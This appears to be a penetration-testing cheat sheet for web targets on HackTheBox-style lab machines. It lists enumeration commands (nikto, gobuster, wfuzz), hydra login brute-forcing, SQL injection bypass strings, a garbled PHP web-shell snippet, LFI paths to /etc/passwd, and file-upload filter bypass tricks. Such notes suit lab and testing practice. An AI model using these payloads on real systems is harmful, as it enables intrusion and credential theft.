80/443 HTTP/s

  • Read Entire page
    • look for emails, names, user info
  • Source code
  • Nikto
    • nikto -h 10.10.10.10 –output filename
  • Subdomains:
    • Dirb
    • dirbuster
      • GUI version
    • gobuster
      • gobuster -w /wordlist.txt -u http://10.10.10.10/ -x php,txt,html
        • use -r (recursive) or try found folders.
    • wfuzz
      • wfuzz -w /wordlist -u tsreetfight.htb/FUZZ –hw 717
      • wfuzz -c -z file,/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt –hc 404 http://10.10.10.86/FUZZ
      • wfuzz -H ‘Host: FUZZ.bighead.htb’ -w /usr/share/seclist/discovery/DNS/fierce-hostlist.txt -u bighead.htb –hh 11127 #bruteforce subdomains
    • Web Extensions
      • sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar
  • Creating wordlist from webpage
    • cewl
  • Burp intercept
    • compare “host:”
    • crsf token = no bruteforce
    • add php code if url has anything.php
      • <?php syetm ($_REQUEST(‘please subscribe’)’ ?>
    • anything being executed?
      • try directory traversal
        • ../../../home
  • LFI/RFI
    • folder that always exist
      • /etc/hosts /etc/resolv.conf
    • add %00jpg to end of files
      • /etc/passwd%00jpg
  • Sign in Page
    • SQL Injection
      • ‘or 1=1– –
      • ‘ or ‘1’=1
      • ‘ or ‘1’=1 — –
      • ‘–
      • Use known Username
        • tyler’ — –
        • tyler’) — –
    • BruteForce
      • hydra -L <username list> -p <password list> <IP Address> <form parameters><failed login message>
        • kali >hydra -L <wordlist> -P<password list>
          192.168.1.101 http-post-form “/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed” -V
        • hydra 192.168.1.69 http-form-post “/w3af/bruteforce/form_login/dataReceptor.php:user=^USER^&pass=^PASS^:Bad login” -L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt
  • check website version
  • redirecting webpage automatically?
    • noredirect plugin
  • powershell – bart
  • File Upload
    • Blacklisting bypass
      • bypassed by uploading an unpopular php extensions. such as: pht, phpt, phtml, php3, php4, php5, php6
    • Whitelisting bypass
      • passed by uploading a file with some type of tricks, Like adding a null byte injection like ( shell.php%00.gif ). Or by using double extensions for the uploaded file like ( shell.jpg.php)
Advertisements